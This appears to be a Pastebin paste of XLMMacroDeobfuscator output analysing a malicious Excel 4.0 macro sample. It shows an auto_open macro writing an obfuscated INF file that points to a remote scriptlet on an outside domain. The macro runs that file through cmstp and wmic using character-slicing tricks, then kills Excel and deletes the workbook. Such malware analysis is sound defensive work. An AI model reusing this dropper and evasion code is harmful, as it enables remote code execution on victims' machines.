Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Ongoing - it is not fully deobfuscated
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\saaaample.xls
- [Loading Cells]
- auto_open: auto_open->Macro1!$A$2
- [Starting Deobfuscation]
- CELL:A2 , NotImplemented , SET.NAME("Yuaf",DIRECTORY()&CHAR(92.0)&CHAR(50.0)&CHAR(52.0)&CHAR(46.0)&CHAR(116.0)&CHAR(120.0)&CHAR(116.0))
- CELL:A3 , NotImplemented , SET.NAME("nCWoR",FOPEN(Yuaf,3.0))
- CELL:A4 , PartialEvaluation , FWRITE("[version]
- signature=$WiNdows NT$
- [DestinationDirs]
- e7=01
- [DefaultInstall_singleUser]
- UnRegisterOCXs=b0
- DelFiles=e7
- [b0]
- %11%\%h9%CrO%q1%j,NI,%i9%%u3%%u3%p%v0%%j4%%j4%")
- CELL:A5 , PartialEvaluation , FWRITE("download%q7%share-spreadsheet%q7%%d2%/readme%q7%txt
- [e7]
- 24%q7%%u3%x%u3%
- [strings]
- u3=t
- i9=h
- v0=:
- h9=s
- j4=/
- q1=b
- q7=.
- d2=com
- serviceName="" ""
- shortSvcName="" ""
- f6=2020-05-22 16:01:58.777231")
- CELL:A6 , PartialEvaluation , FCLOSE()
- CELL:A7 , PartialEvaluation , REGISTER("Shell32","ShellExecuteA","JJCCCCJ","UIBsfb",1.0,9.0)
- CELL:A8 , PartialEvaluation , CALL_ADDIN(0.0,"cmd.exe","/v /c set h3=times& call set q0=%h3:~0,1%& call set y8=%h3:~1,1%& s!q0!art /min """" wm!y8!c process call crea!q0!e ""cms!q0!p /ns /s /su Yuaf""",0.0)
- CELL:A9 , PartialEvaluation , CALL_ADDIN(0.0,"cmd.exe","/c taskkill /f /im excel.exe & ping 127.0.0.1 -n 3 & del ""GET.DOCUMENT(2.0)\GET.WORKBOOK(16.0)""",0.0)
- CELL:A10 , PartialEvaluation , RETURN()
- [END of Deobfuscation]
- time elapsed: 2.8414695262908936
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement